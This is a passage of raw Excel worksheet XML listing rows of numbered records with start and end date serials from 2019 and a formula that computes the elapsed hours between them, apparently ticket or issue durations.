        <f>TEXT(F444-E444,"[h]")</f>
        <v>126</v>
      </c>
    </row>
    <row r="445" spans="1:8" hidden="1">
      <c r="B445">
        <v>13479</v>
      </c>
      <c r="C445" t="s">
        <v>1777</v>
      </c>
      <c r="D445" t="s">
        <v>7</v>
      </c>
      <c r="E445" s="1">
        <v>43590.976944444446</v>
      </c>
      <c r="F445" s="1">
        <v>43596.695092592592</v>
      </c>
      <c r="G445" t="s">
        <v>1778</v>
      </c>
      <c r="H445" t="str">
        <f>TEXT(F445-E445,"[h]")</f>
        <v>137</v>
      </c>
    </row>
    <row r="446" spans="1:8" hidden="1">
      <c r="A446" t="s">
        <v>1779</v>
      </c>
      <c r="B446">
        <v>13477</v>
      </c>
      <c r="C446" t="s">
        <v>1780</v>
      </c>
      <c r="D446" t="s">
        <v>7</v>
      </c>
      <c r="E446" s="1">
        <v>43590.76394675926</v>
      </c>
      <c r="F446" s="1">
        <v>43590.940787037034</v>
      </c>
      <c r="G446" t="s">
        <v>75</v>
      </c>
      <c r="H446" t="str">
        <f>TEXT(F446-E446,"[h]")</f>
        <v>4</v>
      </c>
    </row>
    <row r="447" spans="1:8" hidden="1">
      <c r="A447" t="s">
        <v>1781</v>
      </c>
      <c r="B447">
        <v>13475</v>
      </c>
      <c r="C447" t="s">
        <v>1782</v>
      </c>
      <c r="D447" t="s">
        <v>7</v>
      </c>
      <c r="E447" s="1">
        <v>43590.64261574074</v>
      </c>
      <c r="F447" s="1">
        <v>43593.431956018518</v>
      </c>
      <c r="G447" t="s">
        <v>670</v>
      </c>
      <c r="H447" t="str">
        <f>TEXT(F447-E447,"[h]")</f>
        <v>66</v>
      </c>
    </row>
    <row r="448" spans="1:8" hidden="1">
      <c r="A448" t="s">
        <v>1783</v>
      </c>
      <c r="B448">
        <v>13473</v>
      </c>
      <c r="C448" t="s">
        <v>1784</v>
      </c>
      <c r="D448" t="s">
        <v>7</v>
      </c>
      <c r="E448" s="1">
        <v>43590.548321759263</v>
      </c>
      <c r="F448" s="1">
        <v>43591.011157407411</v>
      </c>
      <c r="G448" t="s">
        <v>258</v>
      </c>
      <c r="H448" t="str">
        <f>TEXT(F448-E448,"[h]")</f>
        <v>11</v>
      </c>
    </row>
    <row r="449" spans="1:8" hidden="1">
      <c r="A449" t="s">
        <v>1785</v>
      </c>
      <c r="B449">
        <v>13471</v>
      </c>
      <c r="C449" t="s">
        <v>1786</v>
      </c>
      <c r="D449" t="s">
        <v>7</v>
      </c>
      <c r="E449" s="1">
        <v>43589.798946759256</v>
      </c>
      <c r="F449" s="1">
        <v>43592.085312499999</v>
      </c>
      <c r="G449" t="s">
        <v>174</v>
      </c>
      <c r="H449" t="str">
        <f>TEXT(F449-E449,"[h]")</f>
        <v>54</v>
      </c>
    </row>
    <row r="450" spans="1:8" hidden="1">
      <c r="A450" t="s">
        <v>1787</v>
      </c>
      <c r="B450">
        <v>13469</v>
      </c>
      <c r="C450" t="s">
        <v>1788</v>
      </c>
      <c r="D450" t="s">
        <v>7</v>
      </c>
      <c r="E450" s="1">
        <v>43589.321967592594</v>
      </c>
      <c r="F450" s="1">
        <v>43589.544814814813</v>
      </c>
      <c r="G450" t="s">
        <v>66</v>
      </c>
      <c r="H450" t="str">
        <f>TEXT(F450-E450,"[h]")</f>
        <v>5</v>
      </c>
    </row>
    <row r="451" spans="1:8" hidden="1">
      <c r="A451" t="s">
        <v>1789</v>
      </c>
      <c r="B451">
        <v>13468</v>
      </c>
      <c r="C451" t="s">
        <v>1790</v>
      </c>
      <c r="D451" t="s">
        <v>7</v>
      </c>
      <c r="E451" s="1">
        <v>43589.186550925922</v>
      </c>
      <c r="F451" s="1">
        <v>43604.717407407406</v>
      </c>
      <c r="G451" t="s">
        <v>1791</v>
      </c>
      <c r="H451" t="str">
        <f>TEXT(F451-E451,"[h]")</f>
        <v>372</v>
      </c>
    </row>
    <row r="452" spans="1:8" hidden="1">
      <c r="A452" t="s">
        <v>1792</v>
      </c>
      <c r="B452">
        <v>13467</v>
      </c>
      <c r="C452" t="s">
        <v>1793</v>
      </c>
      <c r="D452" t="s">
        <v>7</v>
      </c>
      <c r="E452" s="1">
        <v>43589.138703703706</v>
      </c>
      <c r="F452" s="1">
        <v>43589.573067129626</v>
      </c>
      <c r="G452" t="s">
        <v>37</v>
      </c>
      <c r="H452" t="str">
        <f>TEXT(F452-E452,"[h]")</f>
        <v>10</v>
      </c>
    </row>
    <row r="453" spans="1:8" hidden="1">
      <c r="A453" t="s">
        <v>1794</v>
      </c>
      <c r="B453">
        <v>13466</v>
      </c>
      <c r="C453" t="s">
        <v>1795</v>
      </c>
      <c r="D453" t="s">
        <v>7</v>
      </c>
      <c r="E453" s="1">
        <v>43589.083113425928</v>
      </c>
      <c r="F453" s="1">
        <v>43596.70144675926</v>
      </c>
      <c r="G453" t="s">
        <v>55</v>
      </c>
      <c r="H453" t="str">
        <f>TEXT(F453-E453,"[h]")</f>
        <v>182</v>
      </c>
    </row>
    <row r="454" spans="1:8">
      <c r="A454" t="s">
        <v>1796</v>
      </c>
      <c r="B454">
        <v>13463</v>
      </c>
      <c r="C454" t="s">
        <v>1797</v>
      </c>
      <c r="D454" t="s">
        <v>7</v>
      </c>
      <c r="E454" s="1">
        <v>43588.915347222224</v>
      </c>
      <c r="F454" s="1">
        <v>43606.816331018519</v>
      </c>
      <c r="G454" t="s">
        <v>1579</v>
      </c>
      <c r="H454" t="str">
        <f>TEXT(F454-E454,"[h]")</f>
        <v>429</v>
      </c>
    </row>
    <row r="455" spans="1:8" hidden="1">
      <c r="A455" t="s">
        <v>1798</v>
      </c>
      <c r="B455">
        <v>13461</v>
      </c>
      <c r="C455" t="s">
        <v>1799</v>
      </c>
      <c r="D455" t="s">
        <v>7</v>
      </c>
      <c r="E455" s="1">
        <v>43588.462361111109</v>
      </c>
      <c r="F455" s="1">
        <v>43615.387037037035</v>
      </c>
      <c r="G455" t="s">
        <v>115</v>
      </c>
      <c r="H455" t="str">
        <f>TEXT(F455-E455,"[h]")</f>
        <v>646</v>
      </c>
    </row>
    <row r="456" spans="1:8" hidden="1">
      <c r="A456" t="s">
        <v>1800</v>
      </c>
      <c r="B456">
        <v>13460</v>
      </c>
      <c r="C456" t="s">
        <v>1801</v>
      </c>
      <c r="D456" t="s">
        <v>7</v>
      </c>
      <c r="E456" s="1">
        <v>43588.431875000002</v>
      </c>
      <c r="F456" s="1">
        <v>43588.433263888888</v>
      </c>
      <c r="G456" t="s">
        <v>304</v>
      </c>
      <c r="H456" t="str">
        <f>TEXT(F456-E456,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="457" spans="1:8" hidden="1">
      <c r="A457" t="s">
        <v>1802</v>
      </c>
      <c r="B457">
        <v>13459</v>
      </c>
      <c r="C457" t="s">
        <v>1803</v>
      </c>
      <c r="D457" t="s">
        <v>7</v>
      </c>
      <c r="E457" s="1">
        <v>43587.91337962963</v>
      </c>
      <c r="F457" s="1">
        <v>43587.92769675926</v>
      </c>
      <c r="G457" t="s">
        <v>1804</v>
      </c>
      <c r="H457" t="str">
        <f>TEXT(F457-E457,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="458" spans="1:8" hidden="1">
      <c r="A458" t="s">
        <v>1805</v>
      </c>
      <c r="B458">
        <v>13456</v>
      </c>
      <c r="C458" t="s">
        <v>1806</v>
      </c>
      <c r="D458" t="s">
        <v>7</v>
      </c>
      <c r="E458" s="1">
        <v>43587.804780092592</v>
      </c>
      <c r="F458" s="1">
        <v>43588.681666666664</v>
      </c>
      <c r="G458" t="s">
        <v>55</v>
      </c>
      <c r="H458" t="str">
        <f>TEXT(F458-E458,"[h]")</f>
        <v>21</v>
      </c>
    </row>
    <row r="459" spans="1:8">
      <c r="A459" t="s">
        <v>1807</v>
      </c>
      <c r="B459">
        <v>13455</v>
      </c>
      <c r="C459" t="s">
        <v>1808</v>
      </c>
      <c r="D459" t="s">
        <v>7</v>
      </c>
      <c r="E459" s="1">
        <v>43587.777314814812</v>
      </c>
      <c r="F459" s="1">
        <v>43596.692523148151</v>
      </c>
      <c r="G459" t="s">
        <v>732</v>
      </c>
      <c r="H459" t="str">
        <f>TEXT(F459-E459,"[h]")</f>
        <v>213</v>
      </c>
    </row>
    <row r="460" spans="1:8" hidden="1">
      <c r="A460" t="s">
        <v>1809</v>
      </c>
      <c r="B460">
        <v>13454</v>
      </c>
      <c r="C460" t="s">
        <v>1810</v>
      </c>
      <c r="D460" t="s">
        <v>7</v>
      </c>
      <c r="E460" s="1">
        <v>43587.674537037034</v>
      </c>
      <c r="F460" s="1">
        <v>43587.740763888891</v>
      </c>
      <c r="G460" t="s">
        <v>973</v>
      </c>
      <c r="H460" t="str">
        <f>TEXT(F460-E460,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="461" spans="1:8" hidden="1">
      <c r="A461" t="s">
        <v>1811</v>
      </c>
      <c r="B461">
        <v>13452</v>
      </c>
      <c r="C461" t="s">
        <v>1812</v>
      </c>
      <c r="D461" t="s">
        <v>7</v>
      </c>
      <c r="E461" s="1">
        <v>43587.375972222224</v>
      </c>
      <c r="F461" s="1">
        <v>43588.681666666664</v>
      </c>
      <c r="G461" t="s">
        <v>55</v>
      </c>
      <c r="H461" t="str">
        <f>TEXT(F461-E461,"[h]")</f>
        <v>31</v>
      </c>
    </row>
    <row r="462" spans="1:8" hidden="1">
      <c r="A462" t="s">
        <v>1813</v>
      </c>
      <c r="B462">
        <v>13451</v>
      </c>
      <c r="C462" t="s">
        <v>1814</v>
      </c>
      <c r="D462" t="s">
        <v>7</v>
      </c>
      <c r="E462" s="1">
        <v>43587.368495370371</v>
      </c>
      <c r="F462" s="1">
        <v>43695.753136574072</v>
      </c>
      <c r="G462" t="s">
        <v>118</v>
      </c>
      <c r="H462" t="str">
        <f>TEXT(F462-E462,"[h]")</f>
        <v>2601</v>
      </c>
    </row>
    <row r="463" spans="1:8" hidden="1">
      <c r="A463" t="s">
        <v>1815</v>
      </c>
      <c r="B463">
        <v>13450</v>
      </c>
      <c r="C463" t="s">
        <v>1816</v>
      </c>
      <c r="D463" t="s">
        <v>7</v>
      </c>
      <c r="E463" s="1">
        <v>43587.349942129629</v>
      </c>
      <c r="F463" s="1">
        <v>43589.10056712963</v>
      </c>
      <c r="G463" t="s">
        <v>115</v>
      </c>
      <c r="H463" t="str">
        <f>TEXT(F463-E463,"[h]")</f>
        <v>42</v>
      </c>
    </row>
    <row r="464" spans="1:8">
      <c r="A464" t="s">
        <v>1817</v>
      </c>
      <c r="B464">
        <v>13449</v>
      </c>
      <c r="C464" t="s">
        <v>1818</v>
      </c>
      <c r="D464" t="s">
        <v>7</v>
      </c>
      <c r="E464" s="1">
        <v>43587.123784722222</v>
      </c>
      <c r="F464" s="1">
        <v>43587.147685185184</v>
      </c>
      <c r="G464" t="s">
        <v>160</v>
      </c>
      <c r="H464" t="str">
        <f>TEXT(F464-E464,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="465" spans="1:8">
      <c r="A465" t="s">
        <v>1819</v>
      </c>
      <c r="B465">
        <v>13448</v>
      </c>
      <c r="C465" t="s">
        <v>1820</v>
      </c>
      <c r="D465" t="s">
        <v>7</v>
      </c>
      <c r="E465" s="1">
        <v>43587.073865740742</v>
      </c>
      <c r="F465" s="1">
        <v>43587.147673611114</v>
      </c>
      <c r="G465" t="s">
        <v>1709</v>
      </c>
      <c r="H465" t="str">
        <f>TEXT(F465-E465,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="466" spans="1:8" hidden="1">
      <c r="A466" t="s">
        <v>1821</v>
      </c>
      <c r="B466">
        <v>13447</v>
      </c>
      <c r="C466" t="s">
        <v>1822</v>
      </c>
      <c r="D466" t="s">
        <v>7</v>
      </c>
      <c r="E466" s="1">
        <v>43586.869317129633</v>
      </c>
      <c r="F466" s="1">
        <v>43614.848749999997</v>
      </c>
      <c r="G466" t="s">
        <v>66</v>
      </c>
      <c r="H466" t="str">
        <f>TEXT(F466-E466,"[h]")</f>
        <v>671</v>
      </c>
    </row>
    <row r="467" spans="1:8" hidden="1">
      <c r="A467" t="s">
        <v>1823</v>
      </c>
      <c r="B467">
        <v>13446</v>
      </c>
      <c r="C467" t="s">
        <v>1824</v>
      </c>
      <c r="D467" t="s">
        <v>7</v>
      </c>
      <c r="E467" s="1">
        <v>43586.060150462959</v>
      </c>
      <c r="F467" s="1">
        <v>43586.894965277781</v>
      </c>
      <c r="G467" t="s">
        <v>28</v>
      </c>
      <c r="H467" t="str">
        <f>TEXT(F467-E467,"[h]")</f>
        <v>20</v>
      </c>
    </row>
    <row r="468" spans="1:8" hidden="1">
      <c r="A468" t="s">
        <v>1825</v>
      </c>
      <c r="B468">
        <v>13445</v>
      </c>
      <c r="C468" t="s">
        <v>1826</v>
      </c>
      <c r="D468" t="s">
        <v>7</v>
      </c>
      <c r="E468" s="1">
        <v>43586.005810185183</v>
      </c>
      <c r="F468" s="1">
        <v>43614.219710648147</v>
      </c>
      <c r="G468" t="s">
        <v>28</v>
      </c>
      <c r="H468" t="str">
        <f>TEXT(F468-E468,"[h]")</f>
        <v>677</v>
      </c>
    </row>
    <row r="469" spans="1:8" hidden="1">
      <c r="A469" t="s">
        <v>1827</v>
      </c>
      <c r="B469">
        <v>13443</v>
      </c>
      <c r="C469" t="s">
        <v>1828</v>
      </c>
      <c r="D469" t="s">
        <v>7</v>
      </c>
      <c r="E469" s="1">
        <v>43585.931493055556</v>
      </c>
      <c r="F469" s="1">
        <v>43586.046898148146</v>
      </c>
      <c r="G469" t="s">
        <v>1185</v>
      </c>
      <c r="H469" t="str">
        <f>TEXT(F469-E469,"[h]")</f>
        <v>2</v>
      </c>
    </row>
    <row r="470" spans="1:8" hidden="1">
      <c r="A470" t="s">
        <v>1829</v>
      </c>
      <c r="B470">
        <v>13441</v>
      </c>
      <c r="C470" t="s">
        <v>1830</v>
      </c>
      <c r="D470" t="s">
        <v>7</v>
      </c>
      <c r="E470" s="1">
        <v>43585.849849537037</v>
      </c>
      <c r="F470" s="1">
        <v>43615.386643518519</v>
      </c>
      <c r="G470" t="s">
        <v>118</v>
      </c>
      <c r="H470" t="str">
        <f>TEXT(F470-E470,"[h]")</f>
        <v>708</v>
      </c>
    </row>
    <row r="471" spans="1:8" hidden="1">
      <c r="A471" t="s">
        <v>1772</v>
      </c>
      <c r="B471">
        <v>13440</v>
      </c>
      <c r="C471" t="s">
        <v>1831</v>
      </c>
      <c r="D471" t="s">
        <v>7</v>
      </c>
      <c r="E471" s="1">
        <v>43585.83871527778</v>
      </c>
      <c r="F471" s="1">
        <v>43586.994293981479</v>
      </c>
      <c r="G471" t="s">
        <v>255</v>
      </c>
      <c r="H471" t="str">
        <f>TEXT(F471-E471,"[h]")</f>
        <v>27</v>
      </c>
    </row>
    <row r="472" spans="1:8">
      <c r="A472" t="s">
        <v>1832</v>
      </c>
      <c r="B472">
        <v>13439</v>
      </c>
      <c r="C472" t="s">
        <v>1833</v>
      </c>
      <c r="D472" t="s">
        <v>7</v>
      </c>
      <c r="E472" s="1">
        <v>43585.833402777775</v>
      </c>
      <c r="F472" s="1">
        <v>43587.025347222225</v>
      </c>
      <c r="G472" t="s">
        <v>16</v>
      </c>
      <c r="H472" t="str">
        <f>TEXT(F472-E472,"[h]")</f>
        <v>28</v>
      </c>
    </row>
    <row r="473" spans="1:8">
      <c r="A473" t="s">
        <v>1834</v>
      </c>
      <c r="B473">
        <v>13438</v>
      </c>
      <c r="C473" t="s">
        <v>1835</v>
      </c>
      <c r="D473" t="s">
        <v>7</v>
      </c>
      <c r="E473" s="1">
        <v>43585.832592592589</v>
      </c>
      <c r="F473" s="1">
        <v>43716.629143518519</v>
      </c>
      <c r="G473" t="s">
        <v>1423</v>
      </c>
      <c r="H473" t="str">
        <f>TEXT(F473-E473,"[h]")</f>
        <v>3139</v>
      </c>
    </row>
    <row r="474" spans="1:8" hidden="1">
      <c r="A474" t="s">
        <v>1836</v>
      </c>
      <c r="B474">
        <v>13437</v>
      </c>
      <c r="C474" t="s">
        <v>1837</v>
      </c>
      <c r="D474" t="s">
        <v>7</v>
      </c>
      <c r="E474" s="1">
        <v>43585.788993055554</v>
      </c>
      <c r="F474" s="1">
        <v>43586.046898148146</v>
      </c>
      <c r="G474" t="s">
        <v>1838</v>
      </c>
      <c r="H474" t="str">
        <f>TEXT(F474-E474,"[h]")</f>
        <v>6</v>
      </c>
    </row>
    <row r="475" spans="1:8" hidden="1">
      <c r="A475" t="s">
        <v>1839</v>
      </c>
      <c r="B475">
        <v>13436</v>
      </c>
      <c r="C475" t="s">
        <v>1840</v>
      </c>
      <c r="D475" t="s">
        <v>7</v>
      </c>
      <c r="E475" s="1">
        <v>43585.56627314815</v>
      </c>
      <c r="F475" s="1">
        <v>43585.672847222224</v>
      </c>
      <c r="G475" t="s">
        <v>55</v>
      </c>
      <c r="H475" t="str">
        <f>TEXT(F475-E475,"[h]")</f>
        <v>2</v>
      </c>
    </row>
    <row r="476" spans="1:8">
      <c r="A476" t="s">
        <v>1700</v>
      </c>
      <c r="B476">
        <v>13435</v>
      </c>
      <c r="C476" t="s">
        <v>1701</v>
      </c>
      <c r="D476" t="s">
        <v>7</v>
      </c>
      <c r="E476" s="1">
        <v>43585.545648148145</v>
      </c>
      <c r="F476" s="1">
        <v>43585.599409722221</v>
      </c>
      <c r="G476" t="s">
        <v>483</v>
      </c>
      <c r="H476" t="str">
        <f>TEXT(F476-E476,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="477" spans="1:8" hidden="1">
      <c r="A477" t="s">
        <v>1841</v>
      </c>
      <c r="B477">
        <v>13434</v>
      </c>
      <c r="C477" t="s">
        <v>1842</v>
      </c>
      <c r="D477" t="s">
        <v>7</v>
      </c>
      <c r="E477" s="1">
        <v>43585.537222222221</v>
      </c>
      <c r="F477" s="1">
        <v>43585.567048611112</v>
      </c>
      <c r="G477" t="s">
        <v>304</v>
      </c>
      <c r="H477" t="str">
        <f>TEXT(F477-E477,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="478" spans="1:8">
      <c r="A478" t="s">
        <v>1698</v>
      </c>
      <c r="B478">
        <v>13433</v>
      </c>
      <c r="C478" t="s">
        <v>1699</v>
      </c>
      <c r="D478" t="s">
        <v>7</v>
      </c>
      <c r="E478" s="1">
        <v>43585.459606481483</v>
      </c>
      <c r="F478" s="1">
        <v>43597.331875000003</v>
      </c>
      <c r="G478" t="s">
        <v>1423</v>
      </c>
      <c r="H478" t="str">
        <f>TEXT(F478-E478,"[h]")</f>
        <v>284</v>
      </c>
    </row>
    <row r="479" spans="1:8" hidden="1">
      <c r="A479" t="s">
        <v>1843</v>
      </c>
      <c r="B479">
        <v>13431</v>
      </c>
      <c r="C479" t="s">
        <v>1844</v>
      </c>
      <c r="D479" t="s">
        <v>7</v>
      </c>
      <c r="E479" s="1">
        <v>43585.236840277779</v>
      </c>
      <c r="F479" s="1">
        <v>43597.331875000003</v>
      </c>
      <c r="G479" t="s">
        <v>109</v>
      </c>
      <c r="H479" t="str">
        <f>TEXT(F479-E479,"[h]")</f>
        <v>290</v>
      </c>
    </row>
    <row r="480" spans="1:8">
      <c r="A480" t="s">
        <v>1845</v>
      </c>
      <c r="B480">
        <v>13430</v>
      </c>
      <c r="C480" t="s">
        <v>1846</v>
      </c>
      <c r="D480" t="s">
        <v>7</v>
      </c>
      <c r="E480" s="1">
        <v>43585.11482638889</v>
      </c>
      <c r="F480" s="1">
        <v>43730.731527777774</v>
      </c>
      <c r="G480" t="s">
        <v>25</v>
      </c>
      <c r="H480" t="str">
        <f>TEXT(F480-E480,"[h]")</f>
        <v>3494</v>
      </c>
    </row>
    <row r="481" spans="1:8" hidden="1">
      <c r="A481" t="s">
        <v>1847</v>
      </c>
      <c r="B481">
        <v>13429</v>
      </c>
      <c r="C481" t="s">
        <v>1848</v>
      </c>
      <c r="D481" t="s">
        <v>7</v>
      </c>
      <c r="E481" s="1">
        <v>43585.037673611114</v>
      </c>
      <c r="F481" s="1">
        <v>43585.599409722221</v>
      </c>
      <c r="G481" t="s">
        <v>1849</v>
      </c>
      <c r="H481" t="str">
        <f>TEXT(F481-E481,"[h]")</f>
        <v>13</v>
      </c>
    </row>
    <row r="482" spans="1:8" hidden="1">
      <c r="A482" t="s">
        <v>1850</v>
      </c>
      <c r="B482">
        <v>13426</v>
      </c>
      <c r="C482" t="s">
        <v>1851</v>
      </c>
      <c r="D482" t="s">
        <v>7</v>
      </c>
      <c r="E482" s="1">
        <v>43584.710173611114</v>
      </c>
      <c r="F482" s="1">
        <v>43615.389004629629</v>
      </c>
      <c r="G482" t="s">
        <v>118</v>
      </c>
      <c r="H482" t="str">
        <f>TEXT(F482-E482,"[h]")</f>
        <v>736</v>
      </c>
    </row>
    <row r="483" spans="1:8" hidden="1">
      <c r="A483" t="s">
        <v>1306</v>
      </c>
      <c r="B483">
        <v>13422</v>
      </c>
      <c r="C483" t="s">
        <v>1852</v>
      </c>
      <c r="D483" t="s">
        <v>7</v>
      </c>
      <c r="E483" s="1">
        <v>43584.103935185187</v>
      </c>
      <c r="F483" s="1">
        <v>43615.389421296299</v>
      </c>
      <c r="G483" t="s">
        <v>118</v>
      </c>
      <c r="H483" t="str">
        <f>TEXT(F483-E483,"[h]")</f>
        <v>750</v>
      </c>
    </row>
    <row r="484" spans="1:8" hidden="1">
      <c r="A484" t="s">
        <v>1772</v>
      </c>
      <c r="B484">
        <v>13420</v>
      </c>
      <c r="C484" t="s">
        <v>1853</v>
      </c>
      <c r="D484" t="s">
        <v>7</v>
      </c>
      <c r="E484" s="1">
        <v>43583.832152777781</v>
      </c>
      <c r="F484" s="1">
        <v>43588.281597222223</v>
      </c>
      <c r="G484" t="s">
        <v>1681</v>
      </c>
      <c r="H484" t="str">
        <f>TEXT(F484-E484,"[h]")</f>
        <v>106</v>
      </c>
    </row>
    <row r="485" spans="1:8" hidden="1">
      <c r="A485" t="s">
        <v>1854</v>
      </c>
      <c r="B485">
        <v>13419</v>
      </c>
      <c r="C485" t="s">
        <v>1855</v>
      </c>
      <c r="D485" t="s">
        <v>7</v>
      </c>
      <c r="E485" s="1">
        <v>43583.802499999998</v>
      </c>
      <c r="F485" s="1">
        <v>43584.671446759261</v>
      </c>
      <c r="G485" t="s">
        <v>1856</v>
      </c>
      <c r="H485" t="str">
        <f>TEXT(F485-E485,"[h]")</f>
        <v>20</v>
      </c>
    </row>
    <row r="486" spans="1:8" hidden="1">
      <c r="A486" t="s">
        <v>1857</v>
      </c>
      <c r="B486">
        <v>13417</v>
      </c>
      <c r="C486" t="s">
        <v>1858</v>
      </c>
      <c r="D486" t="s">
        <v>7</v>
      </c>
      <c r="E486" s="1">
        <v>43582.907060185185</v>
      </c>
      <c r="F486" s="1">
        <v>43582.932013888887</v>
      </c>
      <c r="G486" t="s">
        <v>66</v>
      </c>
      <c r="H486" t="str">
        <f>TEXT(F486-E486,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="487" spans="1:8">
      <c r="A487" t="s">
        <v>1696</v>
      </c>
      <c r="B487">
        <v>13416</v>
      </c>
      <c r="C487" t="s">
        <v>1697</v>
      </c>
      <c r="D487" t="s">
        <v>7</v>
      </c>
      <c r="E487" s="1">
        <v>43582.694953703707</v>
      </c>
      <c r="F487" s="1">
        <v>43596.703692129631</v>
      </c>
      <c r="G487" t="s">
        <v>189</v>
      </c>
      <c r="H487" t="str">
        <f>TEXT(F487-E487,"[h]")</f>
        <v>336</v>
      </c>
    </row>
    <row r="488" spans="1:8" hidden="1">
      <c r="A488" t="s">
        <v>1859</v>
      </c>
      <c r="B488">
        <v>13413</v>
      </c>
      <c r="C488" t="s">
        <v>1860</v>
      </c>
      <c r="D488" t="s">
        <v>7</v>
      </c>
      <c r="E488" s="1">
        <v>43582.056516203702</v>
      </c>
      <c r="F488" s="1">
        <v>43585.974756944444</v>
      </c>
      <c r="G488" t="s">
        <v>66</v>
      </c>
      <c r="H488" t="str">
        <f>TEXT(F488-E488,"[h]")</f>
        <v>94</v>
      </c>
    </row>
    <row r="489" spans="1:8">
      <c r="A489" t="s">
        <v>1861</v>
      </c>
      <c r="B489">
        <v>13412</v>
      </c>
      <c r="C489" t="s">
        <v>1862</v>
      </c>
      <c r="D489" t="s">
        <v>7</v>
      </c>
      <c r="E489" s="1">
        <v>43581.901412037034</v>
      </c>
      <c r="F489" s="1">
        <v>43607.699664351851</v>
      </c>
      <c r="G489" t="s">
        <v>1709</v>
      </c>
      <c r="H489" t="str">
        <f>TEXT(F489-E489,"[h]")</f>
        <v>619</v>
      </c>
    </row>
    <row r="490" spans="1:8" hidden="1">
      <c r="A490" t="s">
        <v>1863</v>
      </c>
      <c r="B490">
        <v>13410</v>
      </c>
      <c r="C490" t="s">
        <v>1864</v>
      </c>
      <c r="D490" t="s">
        <v>7</v>
      </c>
      <c r="E490" s="1">
        <v>43581.706817129627</v>
      </c>
      <c r="F490" s="1">
        <v>43581.972696759258</v>
      </c>
      <c r="G490" t="s">
        <v>1535</v>
      </c>
      <c r="H490" t="str">
        <f>TEXT(F490-E490,"[h]")</f>
        <v>6</v>
      </c>
    </row>
    <row r="491" spans="1:8" hidden="1">
      <c r="A491" t="s">
        <v>1865</v>
      </c>
      <c r="B491">
        <v>13409</v>
      </c>
      <c r="C491" t="s">
        <v>1866</v>
      </c>
      <c r="D491" t="s">
        <v>7</v>
      </c>
      <c r="E491" s="1">
        <v>43581.69222222222</v>
      </c>
      <c r="F491" s="1">
        <v>43581.908206018517</v>
      </c>
      <c r="G491" t="s">
        <v>1867</v>
      </c>
      <c r="H491" t="str">
        <f>TEXT(F491-E491,"[h]")</f>
        <v>5</v>
      </c>
    </row>
    <row r="492" spans="1:8" hidden="1">
      <c r="A492" t="s">
        <v>1868</v>
      </c>
      <c r="B492">
        <v>13406</v>
      </c>
      <c r="C492" t="s">
        <v>1869</v>
      </c>
      <c r="D492" t="s">
        <v>7</v>
      </c>
      <c r="E492" s="1">
        <v>43581.096018518518</v>
      </c>
      <c r="F492" s="1">
        <v>43614.225057870368</v>
      </c>
      <c r="G492" t="s">
        <v>255</v>
      </c>
      <c r="H492" t="str">
        <f>TEXT(F492-E492,"[h]")</f>
        <v>795</v>
      </c>
    </row>
    <row r="493" spans="1:8" hidden="1">
      <c r="A493" t="s">
        <v>1870</v>
      </c>
      <c r="B493">
        <v>13404</v>
      </c>
      <c r="C493" t="s">
        <v>1871</v>
      </c>
      <c r="D493" t="s">
        <v>7</v>
      </c>
      <c r="E493" s="1">
        <v>43580.998182870368</v>
      </c>
      <c r="F493" s="1">
        <v>43581.004074074073</v>
      </c>
      <c r="G493" t="s">
        <v>51</v>
      </c>
      <c r="H493" t="str">
        <f>TEXT(F493-E493,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="494" spans="1:8" hidden="1">
      <c r="A494" t="s">
        <v>1872</v>
      </c>
      <c r="B494">
        <v>13403</v>
      </c>
      <c r="C494" t="s">
        <v>1873</v>
      </c>
      <c r="D494" t="s">
        <v>7</v>
      </c>
      <c r="E494" s="1">
        <v>43580.493113425924</v>
      </c>
      <c r="F494" s="1">
        <v>43580.521990740737</v>
      </c>
      <c r="G494" t="s">
        <v>66</v>
      </c>
      <c r="H494" t="str">
        <f>TEXT(F494-E494,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="495" spans="1:8" hidden="1">
      <c r="A495" t="s">
        <v>1874</v>
      </c>
      <c r="B495">
        <v>13402</v>
      </c>
      <c r="C495" t="s">
        <v>1875</v>
      </c>
      <c r="D495" t="s">
        <v>7</v>
      </c>
      <c r="E495" s="1">
        <v>43580.192152777781</v>
      </c>
      <c r="F495" s="1">
        <v>43596.764525462961</v>
      </c>
      <c r="G495" t="s">
        <v>66</v>
      </c>
      <c r="H495" t="str">
        <f>TEXT(F495-E495,"[h]")</f>
        <v>397</v>
      </c>
    </row>
    <row r="496" spans="1:8" hidden="1">
      <c r="A496" t="s">
        <v>1876</v>
      </c>
      <c r="B496">
        <v>13401</v>
      </c>
      <c r="C496" t="s">
        <v>1877</v>
      </c>
      <c r="D496" t="s">
        <v>7</v>
      </c>
      <c r="E496" s="1">
        <v>43579.782430555555</v>
      </c>
      <c r="F496" s="1">
        <v>43584.792094907411</v>
      </c>
      <c r="G496" t="s">
        <v>886</v>
      </c>
      <c r="H496" t="str">
        <f>TEXT(F496-E496,"[h]")</f>
        <v>120</v>
      </c>
    </row>
    <row r="497" spans="1:8">
      <c r="A497" t="s">
        <v>1878</v>
      </c>
      <c r="B497">
        <v>13400</v>
      </c>
      <c r="C497" t="s">
        <v>1879</v>
      </c>
      <c r="D497" t="s">
        <v>7</v>
      </c>
      <c r="E497" s="1">
        <v>43579.761458333334</v>
      </c>
      <c r="F497" s="1">
        <v>43642.727233796293</v>
      </c>
      <c r="G497" t="s">
        <v>16</v>
      </c>
      <c r="H497" t="str">
        <f>TEXT(F497-E497,"[h]")</f>
        <v>1511</v>
      </c>
    </row>
    <row r="498" spans="1:8" hidden="1">
      <c r="A498" t="s">
        <v>1880</v>
      </c>
      <c r="B498">
        <v>13399</v>
      </c>
      <c r="C498" t="s">
        <v>1881</v>
      </c>
      <c r="D498" t="s">
        <v>7</v>
      </c>
      <c r="E498" s="1">
        <v>43579.554560185185</v>
      </c>
      <c r="F498" s="1">
        <v>43611.480451388888</v>
      </c>
      <c r="G498" t="s">
        <v>37</v>
      </c>
      <c r="H498" t="str">
        <f>TEXT(F498-E498,"[h]")</f>
        <v>766</v>
      </c>
    </row>
    <row r="499" spans="1:8" hidden="1">
      <c r="A499" t="s">
        <v>1882</v>
      </c>
      <c r="B499">
        <v>13397</v>
      </c>
